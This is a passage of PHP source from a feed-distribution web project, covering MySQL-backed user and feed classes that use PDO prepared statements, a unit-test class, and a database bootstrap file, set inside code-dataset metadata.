searchAll(array $userinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAll($userinfo, $db);\n }\n /* MySQLUsers::__searchAll is a helper function to MySQLUsers::searchAll \n which performs the actual search operation. This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAll(array $userinfo, MySQLDB $db) {\n return self::__search($userinfo, 'AND', $db);\n }\n\n/* MySQLUsers::searchAny implements iUsers::searchAny (see corresponding\n documentation)\n*/\n public static function searchAny(array $userinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAny($userinfo, $db);\n }\n /* MySQLUsers::__searchAny is a helper function to MySQLUsers::searchAny \n which performs the actual search operation. This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAny(array $userinfo, MySQLDB $db) {\n return self::__search($userinfo, 'OR', $db);\n }\n\n/* MySQLUsers::merge implements iUsers::merge (see corresponding documentation)\n*/\n public function merge(iUsers $users) {\n return self::__merge($users);\n }\n /* MySQLUsers::__merge is a helper function to MySQLUsers::merge which\n performs the actual merge operation. This function was added in order to\n use typehinting on parameter $users.\n */\n public function __merge(MySQLUsers $users) {\n if ($this->db !== $users->db)\n throw new InvalidArgumentException('$db must match between objects');\n $c = __CLASS__;\n return new $c(array_merge($this->users, $users->users), $this->db);\n }\n}\n\n/* class MySQLUser implements iUser on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLUser extends MySQLDBObject implements iUser {\n /* $db is the database which contains this user */\n private $db;\n /* $uid is the unique user identifier which is used to access user \n information in the database */\n public $uid;\n\n static $carrier_attr = 'carrier';\n static $feeds_attr = 'feeds';\n static $reception_attrs_to_methods = array('send_email'=>'email',\n\t\t\t\t\t 'send_sms_link'=>'sms_link', \n\t\t\t\t\t 'send_sms_text'=>'sms_text');\n\n /* function MySQLUser::__construct is the constructor for the class\n\n $db: (MySQLDB) a valid MySQLDB object connected to the MySQL database to\n use\n */\n private function __construct(MySQLDB $db) {\n $this->db = $db;\n }\n\n /* function MySQLDB::__get is the PHP magic 'get' function for the class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* function MySQLDB::__set is the PHP magic 'set' function for the class */\n public function __set($name, $value) {\n $this->set(array($name=>$value));\n }\n\n /* parseUserInfo transforms a $userinfo array, in the format taken by many\n iUser functions, into an associative array with keys as database column\n names\n */\n private static function parseUserInfo(array $userinfo, MySQLDB $db) {\n static $valid_userinfo_attrs = \n array('username'=>TRUE, 'email'=>TRUE, 'password'=>TRUE, \n\t 'phone_number'=>TRUE, 'phone_pin'=>TRUE, 'phone_confirmed'=>TRUE,\n\t 'email_pin'=>TRUE, 'email_confirmed'=>TRUE);\n\n if ($userinfo['phone_confirmed'] === FALSE)\n throw new UnexpectedValueException('attribute phone_confirmed cannot be'.\n\t\t\t\t\t ' set to FALSE');\n if ($userinfo['email_confirmed'] === FALSE)\n throw new UnexpectedValueException('attribute email_confirmed cannot be'.\n\t\t\t\t\t ' set to FALSE');\n\n // check for simultaneous pin and confirmed\n if (isset($userinfo['email_pin']) && isset($userinfo['email_confirmed']))\n throw new InvalidArgumentException('email_pin and email_confirmed '.\n\t\t\t\t\t 'attributes cannot be set '.\n\t\t\t\t\t 'simultaneously');\n if (isset($userinfo['phone_pin']) && isset($userinfo['phone_confirmed']))\n throw new InvalidArgumentException('phone_pin and phone_confirmed '.\n\t\t\t\t\t 'attributes cannot be set '.\n\t\t\t\t\t 'simultaneously');\n\n $db_userinfo = array();\n\n // rename the userinfo keys as database column names\n foreach ($userinfo as $key=>$value)\n if (isset($valid_userinfo_attrs[$key]))\n\t$db_userinfo[self::$userattrs_to_cols[$key]] = $value;\n\n // fix pin and confirmed attributes\n if (isset($db_userinfo['phone_status'])\n\t&& $db_userinfo['phone_status'] === TRUE)\n $db_userinfo['phone_status'] = 0;\n if (isset($db_userinfo['email_status'])\n\t&& $db_userinfo['email_status'] === TRUE)\n $db_userinfo['email_status'] = 0;\n\n return $db_userinfo;\n }\n\n/* MySQLUser::find implements iUser::find (see corresponding documentation).\n This function IS vulnerable to SQL injection in parameter $attr.\n*/\n public static function find($attr, $value, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* MySQLUser::__find is a helper function to MySQLUser::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, MySQLDB $db) {\n /* $valid_find_userattrs is a list of attributes from $userinfo which can\n be used as input to this function. Keep this list updated with\n MySQLDBObject::$userattrs_to_cols.\n */\n static $valid_find_userattrs = \n array('id'=>TRUE, 'uid'=>TRUE, 'username'=>TRUE, 'email'=>TRUE,\n\t 'password'=>TRUE, 'phone_number'=>TRUE);\n\n if (isset($valid_find_userattrs[$attr]))\n $db_attr = self::$userattrs_to_cols[$attr];\n else\n throw new InvalidArgumentException('parameter $attr is not a valid '.\n\t\t\t\t\t 'attribute');\n\n\n $find_sql = \"SELECT uid FROM users WHERE $db_attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? $find_result : NULL;\n }\n\n/* MySQLUser::set implements iUser::set (see corresponding documentation)\n*/\n public function set(array $userinfo) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $this->db);\n\n $sql_added = FALSE;\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array();\n if (isset($userinfo[self::$carrier_attr]))\n $carrier_bind['carrior_name'] = $userinfo[self::$carrier_attr];\n\n // build the SQL query to use to update the user\n $update_sql = 'UPDATE users SET ';\n // add column names and values\n foreach ($db_userinfo as $col=>$value) {\n $update_sql .= $col.'=:'.$col.', ';\n $sql_added = TRUE;\n }\n // add carrier name and value\n if (isset($userinfo[self::$carrier_attr])) {\n $update_sql .= $carrier_col.'='.$carrier_sql.', ';\n $sql_added = TRUE;\n }\n // remove trailing comma and space\n $update_sql = substr($update_sql, 0, -2);\n // add rest of UPDATE statment\n $update_sql .= ' WHERE uid=:uid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n // prepare the SQL statement\n $update_stmt = $this->db->pdo->prepare($update_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n\t$update_stmt->bindValue(':'.$col, $value);\n // bind uid\n $update_stmt->bindParam(':uid', $this->uid);\n \n // execute the SQL statement\n $update_stmt->execute();\n }\n\n // deal with setting user reception methods\n $this->setReceptions($userinfo);\n\n // set feeds for user if necessary\n if (isset($userinfo[self::$feeds_attr]))\n $this->setFeeds($userinfo[self::$feeds_attr]);\n }\n\n /* MySQLUser::setReceptions sets reception methods for a user based on an\n arbitrary $userinfo array\n\n $userinfo: (array) user receptions to set, encoded in key-value pairs as\n described for the $userinfo parameter in MySQLUser::set\n */\n private function setReceptions(array $userinfo) {\n /* receptions require reception_method to be looked up 'reception_methods'\n and set for the user separately in 'receptions' */\n static $reception_enable_sql =\n 'INSERT IGNORE INTO receptions (uid, rid) \n VALUES (:uid, (SELECT rid FROM reception_methods \n WHERE method_type=:method));';\n static $reception_disable_sql =\n 'DELETE FROM receptions WHERE uid=:uid AND \n rid=(SELECT rid FROM reception_methods WHERE method_type=:method);';\n\n foreach (self::$reception_attrs_to_methods as $attr=>$method) {\n if (isset($userinfo[$attr])) {\n\tif ($userinfo[$attr] === TRUE) {\n\t // we only need to prepare statement once\n\t if (!isset($reception_enable_stmt)) {\n\t // prepare the enabling statement\n\t $reception_enable_stmt =\n\t $this->db->pdo->prepare($reception_enable_sql);\n\t // bind values and dynamic parameters\n\t $reception_enable_stmt->bindValue(':uid', $this->uid);\n\t $reception_enable_stmt->bindParam(':method', $method);\n\t }\n\n\t // execute the statement\n\t $reception_enable_stmt->execute();\n\t} else if ($userinfo[$attr] === FALSE) {\n\t // we only need to prepare statement once\n\t if (!isset($reception_disable_stmt)) {\n\t // prepare the disabling statement\n\t $reception_disable_stmt = \n\t $this->db->pdo->prepare($reception_disable_sql);\n\t // bind static values and dynamic parameters\n\t $reception_disable_stmt->bindValue(':uid', $this->uid);\n\t $reception_disable_stmt->bindParam(':method', $method);\n\t }\n\n\t // execute the statement\n\t $reception_disable_stmt->execute();\n\t}\n }\n }\n }\n\n /* MySQLUser::getReceptions gets reception method settings for a user based\n on an arbitrary $userattrs array\n\n $userattrs: (array) an array of strings specifying the desired user\n reception method settings to get, selected from the possible\n\t\t keys in the list of key-value pairs returned by MySQLUser::get\n\n returns an array containing all requested user reception method settings\n that could be successfully fetched, in the form described in the\n description of the $userattrs parameter\n */\n private function getReceptions(array $userattrs) {\n /* receptions require reception_method to be looked up 'reception_methods'\n and retrieved for the user separately in 'receptions' */\n static $reception_sql =\n 'SELECT TRUE FROM receptions WHERE uid=:uid AND \n rid=(SELECT rid FROM reception_methods WHERE method_type=:method);';\n\n $userinfo = array();\n\n // prepare the enabling statement\n $reception_stmt = $this->db->pdo->prepare($reception_sql);\n // bind values and dynamic parameters\n $reception_stmt->bindValue(':uid', $this->uid);\n $reception_stmt->bindParam(':method', $method);\n foreach (self::$reception_attrs_to_methods as $attr=>$method) {\n if (in_array($attr, $userattrs)) {\n\t$reception_stmt->execute();\n\t$userinfo[$attr] = ($reception_stmt->fetch() !== FALSE);\n }\n }\n\n return $userinfo;\n }\n\n/* MySQLUser::addFeed implements iUser::addFeed (see corresponding \n documentation)\n*/\n public function addFeed(iFeed $feed) {\n return $this->addFeeds(new MySQLFeeds(array($feed), $this->db));\n }\n\n/* MySQLUser::addFeeds implements iUser::addFeeds (see corresponding \n documentation)\n*/\n public function addFeeds(iFeeds $feeds) {\n return $this->__addFeeds($feeds);\n }\n\n /* MySQLUser::__addFeeds is a helper function to MySQLUser::addFeeds which\n performs the actual add operation. This function was added in order to use\n typehinting on parameter $feeds.\n */\n private function __addFeeds(MySQLFeeds $feeds) {\n /* $feeds_find_sql is the SQL statement used to verify that the user has\n not already subscribed to a feed */\n static $feeds_find_sql =\n 'SELECT TRUE FROM favorites WHERE uid=:uid AND sid=:sid;';\n /* $feeds_sql is the SQL statement used to add a feed subscription to the \n user */\n static $feeds_sql = \n 'INSERT IGNORE INTO favorites (uid, sid, priority)\n VALUES (:uid, :sid, :priority)';\n\n // prepare the find subscription SQL statement (to be used multiple times)\n $feeds_find_stmt = $this->db->pdo->prepare($feeds_find_sql);\n // bind the static values\n $feeds_find_stmt->bindValue(':uid', $this->uid);\n // bind the sid to $sid\n $feeds_find_stmt->bindParam(':sid', $sid);\n\n // prepare the add subscription SQL statement (to be used multiple times)\n $feeds_stmt = $this->db->pdo->prepare($feeds_sql);\n // bind the static values\n $feeds_stmt->bindValue(':uid', $this->uid);\n // XXX this is a dummy priority value\n $feeds_stmt->bindValue(':priority', 0);\n // bind the sid to $sid\n $feeds_stmt->bindParam(':sid', $sid);\n\n foreach ($feeds as $feed) {\n // change the sid to use in the statement\n $sid = $feed->sid;\n\n // check that the user is not already subscribed\n $feeds_find_stmt->execute();\n if ($feeds_find_stmt->fetch() === FALSE) {\n\t// execute the add subscription statement\n\t$feeds_stmt->execute();\n }\n }\n }\n\n /* MySQLUser::setFeeds is a written as a helper function to MySQLUser::set\n which carries out the operation of setting a user's feeds\n\n $feeds: (MySQLFeeds) an iFeeds object representing the set of feeds to add\n to the user\n */\n private function setFeeds(MySQLFeeds $feeds) {\n static $delete_feeds_sql = 'DELETE FROM favorites WHERE uid=:uid';\n\n // delete the user's existing feeds\n $delete_feeds_stmt = $this->db->pdo->prepare($delete_feeds_sql);\n $delete_feeds_stmt->bindValue(':uid', $this->uid);\n $delete_feeds_stmt->execute();\n\n // add the new feeds to the user\n $this->addFeeds($feeds);\n }\n\n /* MySQLUser::getFeeds is a written as a helper function to MySQLUser::get\n which carries out the operation of getting a user's feeds\n\n returns a MySQLFeeds object representing the set of the user's feeds\n */\n private function getFeeds() {\n static $feeds_sql = 'SELECT sid FROM favorites WHERE uid=:uid;';\n $feeds_stmt = $this->db->pdo->prepare($feeds_sql);\n $feeds_stmt->bindParam(':uid', $this->uid);\n $feeds_stmt->execute();\n /* XXX creating the objects this way relies on DB consistency (sid is not\n checked to be existent in feed_sources table) */\n $feeds_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this->db));\n $feeds_result = $feeds_stmt->fetchAll();\n return new MySQLFeeds($feeds_result, $this->db);\n }\n\n/* MySQLUser::get implements iUser::get (see corresponding documentation)\n*/\n public function get(array $userattrs) {\n /* $valid_userattrs is a list of attributes from $userattrs which can be\n handled by the simple sql query generator below. Keep this list updated\n with MySQLDBObject::$userattrs_to_cols.\n */\n static $valid_userattrs = \n array('username'=>TRUE, 'email'=>TRUE, 'password'=>TRUE, \n\t 'phone_number'=>TRUE, 'phone_pin'=>TRUE, 'phone_confirmed'=>TRUE,\n\t 'email_pin'=>TRUE, 'email_confirmed'=>TRUE);\n\n static $carrier_sql = '(SELECT carrior_name FROM carriors WHERE\n cid=(SELECT cid FROM users WHERE uid=:uid2))';\n\n $sql_added = FALSE;\n $get_result = array();\n\n // build SQL query to use to get user attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($userattrs as $key=>$attr) {\n if (isset($valid_userattrs[$attr])) {\n\t$get_sql .= self::$userattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n } elseif ($attr === self::$carrier_attr) {\n\t$get_sql .= \"$carrier_sql AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM users WHERE uid=:uid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':uid', $this->uid);\n\n // bind carrier specific column values\n if (in_array('carrier', $userattrs))\n\t$get_stmt->bindParam(':uid2', $this->uid);\n \n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetch failed');\n }\n\n // fix pin and confirmed attributes\n if (isset($get_result['phone_pin']) && $get_result['phone_pin'] === 0)\n $get_result['phone_pin'] = NULL;\n if (isset($get_result['phone_confirmed'])) {\n if ($get_result['phone_confirmed'] == 0)\n\t$get_result['phone_confirmed'] = TRUE;\n else\n\t$get_result['phone_confirmed'] = FALSE;\n }\n if (isset($get_result['email_pin']) && $get_result['email_pin'] === 0)\n $get_result['email_pin'] = NULL;\n if (isset($get_result['email_confirmed'])) {\n if ($get_result['email_confirmed'] == 0)\n\t$get_result['email_confirmed'] = TRUE;\n else\n\t$get_result['email_confirmed'] = FALSE;\n }\n\n // get id if requested\n if (in_array('id', $userattrs))\n $get_result['id'] = $this->uid;\n if (in_array('uid', $userattrs))\n $get_result['uid'] = $this->uid;\n\n // get reception method settings if requested\n $get_result = array_merge($get_result, $this->getReceptions($userattrs));\n\n // get feeds if requested\n if (in_array(self::$feeds_attr, $userattrs))\n $get_result[self::$feeds_attr] = $this->getFeeds();\n\n return $get_result;\n }\n\n/* MySQLUser::create implements iUser::create (see corresponding documentation)\n*/\n public static function create(array $userinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($userinfo, $db);\n }\n\n /* MySQLUser::__create is a helper function to MySQLUser::create which\n performs the actual create operation. This function was added in order to \n use typehinting on parameter $db.\n */\n private static function __create($userinfo, MySQLDB $db) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $db);\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array('carrior_name'=>$userinfo['carrier']);\n\n // build the SQL query to use to create the user\n $create_sql = 'INSERT INTO users (';\n // add column names\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= $col.', ';\n $create_sql .= $carrier_col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n // add column values\n $create_sql .= ') VALUES (';\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= ':'.$col.', ';\n $create_sql .= $carrier_sql.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n $create_sql .= ');';\n\n // prepare the SQL statement\n $create_stmt = $db->pdo->prepare($create_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n $create_stmt->bindValue(':'.$col, $value);\n\n // execute the SQL statement\n $create_stmt->execute();\n\n // construct the MySQLUser object\n // XXX check that using PDO::lastInsertId is not a race\n $c = __CLASS__;\n $user = new $c($db);\n $user->uid = $db->pdo->lastInsertId();\n\n // deal with setting user reception methods\n $user->setReceptions($userinfo);\n\n // set the user's inital feeds\n if (isset($userinfo[self::$feeds_attr]))\n $user->feeds = $userinfo[self::$feeds_attr];\n\n return $user;\n }\n\n/* MySQLUser::delete implements iUser::delete (see corresponding documentation)\n*/\n public function delete() {\n // build the SQL query to use to delete the user\n static $delete_sql = 'DELETE FROM users WHERE uid=:uid;';\n // prepare the SQL statement\n $delete_stmt = $this->db->pdo->prepare($delete_sql);\n // bind column values\n $delete_stmt->bindValue(':uid', $this->uid);\n // execute the SQL statement\n $delete_stmt->execute();\n\n /* unset $this->uid so that future operations on this MySQLUser object\n will fail */\n unset ($this->uid);\n }\n}\n" }, { "alpha_fraction": 0.5980704426765442, "alphanum_fraction": 0.6038778424263, "avg_line_length": 33.55016326904297, "blob_id": "cfc54cc2720ad31b535f8a8c73002fd9d3b25187", "content_id": "667d5b1bc1f0917af94a9982def1027e793c74c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 10676, "license_type": "no_license", "max_line_length": 79, "num_lines": 309, "path": "/www/trunk/db_mysql_test.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\nrequire_once('db_mysql_users.php');\nrequire_once('db_mysql_feeds.php');\nrequire_once('db_mysql_stories.php');\n\n/* class MySQLTest contains functions used for unit testing on MySQLObject\n derived classes\n*/\nclass MySQLTest extends MySQLDBObject {\n static $userinfo = array('username'=>'MySQLTest_user',\n\t\t\t 'password'=>'MySQLTest_password',\n\t\t\t 'email'=>'[email protected]',\n\t\t\t 'phone_number'=>'8562447598',\n\t\t\t 'send_email'=>TRUE,\n\t\t\t 'send_sms_text'=>FALSE,\n\t\t\t 'carrier'=>'AT&T');\n static $userinfo_2 = array('username'=>'MySQLTest_user2',\n\t\t\t 'password'=>'MySQLTest_password',\n\t\t\t 'email'=>'[email protected]',\n\t\t\t 'send_email'=>TRUE,\n\t\t\t 'phone_number'=>'9688472548',\n\t\t\t 'carrier'=>'Verizon');\n static $feedinfo = array('name'=>'MySQLTest_feed',\n\t\t\t 'url'=>'MySQLTest_url');\n static $feedinfo_2 = array('name'=>'MySQLTest_feed2',\n\t\t\t 'url'=>'MySQLTest_url2');\n\n public static function testAll(MySQLDB $db = NULL) {\n self::testUser($db);\n self::testUsers($db);\n self::testFeed($db);\n self::testFeeds($db);\n self::testStories($db);\n }\n\n public static function testUser(MySQLDB $db = NULL) {\n try {\n // MySQLUser::create test\n $user = MySQLUser::create(self::$userinfo, $db);\n if ($user === NULL)\n throw new Exception('MySQLUser::create test failed');\n\n // MySQLUser::find test\n $find_user = MySQLUser::find('username', self::$userinfo['username'], $db);\n if ($find_user === NULL)\n throw new Exception('MySQLUser::find test failed');\n\n // MySQLUser::delete test\n $user->delete();\n unset($user);\n $deleted_user = MySQLUser::find('username', \n\t\t\t\t self::$userinfo['username'], $db);\n if ($deleted_user !== NULL)\n throw new Exception('MySQLUser::delete test failed');\n\n // MySQLUser::get test\n $user = MySQLUser::create(self::$userinfo, $db);\n $get_userinfo = $user->get(array_keys(self::$userinfo));\n if ($get_userinfo != self::$userinfo)\n throw new Exception('MySQLUser::get test failed');\n\n // MySQLUser::get no-carrier-as-attr test\n $userinfo_nocarrier = self::$userinfo;\n unset($userinfo_nocarrier['carrier']);\n $get_userinfo_nocarrier = $user->get(array_keys($userinfo_nocarrier));\n if ($get_userinfo_nocarrier != $userinfo_nocarrier)\n throw new Exception('MySQLUser::get no-carrier-as-attr test failed');\n\n // MySQLUser::set test\n $user->set(self::$userinfo_2);\n $set_userinfo = $user->get(array_keys(self::$userinfo_2));\n if ($set_userinfo != self::$userinfo_2)\n throw new Exception('MySQLUser::set test failed');\n\n // MySQLUser::set no-carrier-as-attr test\n $userinfo_2_nocarrier = self::$userinfo_2;\n unset($userinfo_2_nocarrier['carrier']);\n $get_userinfo_2_nocarrier = $user->get(array_keys($userinfo_2_nocarrier));\n if ($get_userinfo_2_nocarrier != $userinfo_2_nocarrier)\n throw new Exception('MySQLUser::set no-carrier-as-attr test failed');\n\n // MySQLUser::__get test\n $get_username = $user->get(array('username'));\n if ($user->username !== $get_username['username'])\n throw new Exception('MySQLUser::__get test failed');\n\n // MySQLUser::__set test\n $user->username = 'newusername';\n if ($user->username !== 'newusername')\n throw new Exception('MySQLUser::__set test failed');\n\n // MySQLUser::create with-feeds test (depends on MySQLFeeds::create)\n $user->delete();\n $feeds = MySQLFeeds::create(array(self::$feedinfo));\n $user = MySQLUser::create(array_merge(self::$userinfo, \n\t\t\t\t\t array('feeds'=>$feeds)), $db);\n if ($user === NULL)\n throw new Exception('MySQLUser::create with-feeds test failed');\n\n // MySQLUser::get feeds test\n $get_userinfo = $user->get(array('feeds'));\n if (!($get_userinfo['feeds'] instanceof MySQLFeeds)\n\t|| count($get_userinfo['feeds']->feeds) != 1)\n throw new Exception('MySQLUser::get feeds test failed');\n\n // MySQLUser::set feeds test\n $feeds = MySQLFeeds::create(array(self::$feedinfo, self::$feedinfo_2));\n $user->set(array('feeds'=>$feeds));\n $get_userinfo = $user->get(array('feeds'));\n if (!($get_userinfo['feeds'] instanceof MySQLFeeds)\n\t|| count($get_userinfo['feeds']->feeds) != 2)\n throw new Exception('MySQLUser::set feeds test failed');\n\n $user->delete();\n foreach ($feeds as $feed)\n $feed->delete();\n unset($user);\n } catch(Exception $e) {\n if (isset($feeds))\n\tforeach ($feeds as $feed)\n\t $feed->delete();\n if (isset($user))\n\t$user->delete();\n throw $e;\n }\n }\n\n public static function testUsers(MySQLDB $db = NULL) {\n try {\n // MySQLUsers::searchAll test\n $user = MySQLUser::create(self::$userinfo, $db);\n $user_2 = MySQLUser::create(self::$userinfo_2, $db);\n $search_users = \n MySQLUsers::searchAll(array_intersect(self::$userinfo, \n\t\t\t\t\t self::$userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('MySQLUsers::searchAll test failed');\n\n // MySQLUsers::searchAny username test\n $search_users = \n MySQLUsers::searchAny(array('username'=>\n\t\t\t\t array(self::$userinfo['username'],\n\t\t\t\t\t self::$userinfo_2['username'])), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('MySQLUsers::searchAny username test failed');\n\n // MySQLUsers::searchAll match-one test\n $search_users = \n MySQLUsers::searchAll(array_diff(self::$userinfo, \n\t\t\t\t self::$userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 1)\n throw new Exception('MySQLUsers::searchAll match-one test failed');\n\n // MySQLUsers::searchAny match-one test\n $search_users_2 = \n MySQLUsers::searchAny(array('username'=>self::$userinfo_2['username']),\n\t\t\t $db);\n if ($search_users_2 === NULL || count($search_users_2->users) !== 1)\n throw new Exception('MySQLUsers::searchAny username match-one test '.\n\t\t\t 'failed');\n\n // MySQLUsers::merge test\n $merge_users = $search_users->merge($search_users_2);\n if ($merge_users === NULL || count($merge_users->users) !== 2)\n throw new Exception('MySQLUsers::merge test failed');\n\n $user->delete();\n $user_2->delete();\n } catch(Exception $e) {\n if (isset($user))\n\t$user->delete();\n if (isset($user_2))\n\t$user_2->delete();\n throw $e;\n } \n }\n\n public static function testFeed(MySQLDB $db = NULL) {\n try {\n // MySQLFeed::create test\n $feed = MySQLFeed::create(self::$feedinfo, $db);\n if ($feed === NULL)\n throw new Exception('MySQLFeed::create test failed');\n\n // MySQLFeed::find test\n $find_feed = MySQLFeed::find('name', self::$feedinfo['name'], $db);\n if ($find_feed === NULL)\n throw new Exception('MySQLFeed::find test failed');\n\n // MySQLFeed::delete test\n $feed->delete();\n unset($feed);\n $deleted_feed = MySQLFeed::find('name', \n\t\t\t\t self::$feedinfo['name'], $db);\n if ($deleted_feed !== NULL)\n throw new Exception('MySQLFeed::delete test failed');\n\n // MySQLFeed::get test\n $feed = MySQLFeed::create(self::$feedinfo, $db);\n $get_feedinfo = $feed->get(array_keys(self::$feedinfo));\n if ($get_feedinfo != self::$feedinfo)\n throw new Exception('MySQLFeed::get test failed');\n\n // MySQLFeed::__get test\n $get_name = $feed->get(array('name'));\n if ($feed->name !== $get_name['name'])\n throw new Exception('MySQLFeed::__get test failed');\n\n $feed->delete();\n } catch(Exception $e) {\n if (isset($feed))\n\t$feed->delete();\n throw $e;\n } \n }\n\n public static function testFeeds(MySQLDB $db = NULL) {\n try {\n $feedinfos = array(self::$feedinfo, self::$feedinfo_2);\n\n // MySQLFeeds::create test\n $feeds = MySQLFeeds::create($feedinfos);\n if ($feeds === NULL || count($feeds->feeds) < 2)\n\tthrow new Exception('MySQLFeeds::create failed');\n\n // MySQLFeeds foreach test\n foreach($feeds as $feed) {\n\tif (!($feed instanceof MySQLFeed))\n\t throw new Exception('MySQLFeeds foreach test failed');\n }\n\n foreach($feeds as $feed)\n\t$feed->delete();\n } catch (Exception $e) {\n if (isset($feeds)) {\n\tforeach($feeds->feeds as $feed)\n\t $feed->delete();\n }\n throw $e;\n }\n }\n\n public static function testStories(MySQLDB $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n try {\n // MySQLFeed::get stories test (relies on MySQLFeed::create)\n $feed = MySQLFeed::create(self::$feedinfo, $db);\n $db->pdo->exec(\"INSERT INTO feed_stories\n\t\t (title, content, url, time_stamp, sid, gid)\n\t\t VALUES ('MySQLTest_title', 'MySQLTest_content',\n 'MySQLTest_storyurl', \".time().\",\n \".$feed->sid.\", 1);\");\n $db->pdo->exec(\"INSERT INTO feed_stories\n\t\t (title, content, url, time_stamp, sid, gid)\n\t\t VALUES ('MySQLTest_title2', 'MySQLTest_content2',\n 'MySQLTest_storyurl', \".time().\",\n \".$feed->sid.\", 1);\");\n\n $get_feedinfo = $feed->get(array('stories'), $db);\n $stories = $get_feedinfo['stories'];\n if ($get_feedinfo === NULL)\n throw new Exception('MySQLFeed::get stories test failed');\n\n // MySQLStories foreach test\n foreach($stories as $story) {\n if (!($story instanceof MySQLStory))\n\tthrow new Exception('MySQLStories foreach test failed');\n }\n\n foreach ($stories as $story) {\n // MySQLStory::find test\n $find_story = MySQLStory::find('fid', $story->fid, $db);\n if ($find_story === NULL || $find_story->fid != $story->fid)\n\tthrow new Exception('MySQLFeed::find test failed');\n\n // MySQLStory::get test\n $get_storyinfo = $story->get(array('url'));\n if ($get_storyinfo['url'] != 'MySQLTest_storyurl')\n\tthrow new Exception('MySQLStory::get test failed');\n\n // MySQLStory::__get test\n $get_name = $story->get(array('content'));\n if ($story->content !== $get_name['content'])\n\tthrow new Exception('MySQLStory::__get test failed');\n\n $db->pdo->exec(\"DELETE FROM feed_stories WHERE fid={$story->fid};\");\n /* XXX if this line is added and \"SELECT * FROM feed_stories WHERE \n\t url='MySQLTest_storyurl';\" is run from the same system in the 'mysql'\n\t program, then the stories are not deleted below! */\n //throw new Exception();\n }\n\n $feed->delete();\n } catch(Exception $e) {\n if (isset($feed)) {\n\t$db->pdo->exec(\"DELETE FROM feed_stories WHERE sid={$feed->sid};\");\n\t$feed->delete();\n }\n throw $e;\n } \n }\n}\n\nrequire_once('db_init.php');\nMySQLTest::testStories();\necho 'all tests passed!';\n" }, { "alpha_fraction": 0.7054794430732727, "alphanum_fraction": 0.7095890641212463, "avg_line_length": 25.071428298950195, "blob_id": "4fd0c19cdbcb40c4c1d15c7cc709b82f3547607f", "content_id": "f34ad7d1303c40e49c65e5b7905f39259dc6336c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 730, "license_type": "no_license", "max_line_length": 49, "num_lines": 28, "path": "/www/trunk/db_init.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\nrequire_once('db_mysql_users.php');\nrequire_once('db_mysql_feeds.php');\nrequire_once('db_mysql_stories.php');\n\n/*\n$db_file = 'test/watercooler.db';\n$db_sql = 'SQLiteDB.sql';\n$sqlite3_prog = 'sqlite3';\n\nif (!file_exists($db_file))\n exec(\"$sqlite3_prog -init $db_sql $db_file\");\n*/\n\n$db = MySQLDB::connectFromIni('db_def_cfg.ini');\nif (!($db instanceof MySQLDB))\n throw new Exception('MySQLDB::connect failed');\n$db->setAsSiteDefault();\n\nclass Stories extends MySQLStories {}\nclass Story extends MySQLStory {}\nclass Feed extends MySQLFeed {}\nclass Feeds extends MySQLFeeds {}\nclass User extends MySQLUser {}\nclass Users extends MySQLUsers {}\nclass DB extends MySQLDB {}\n" }, { 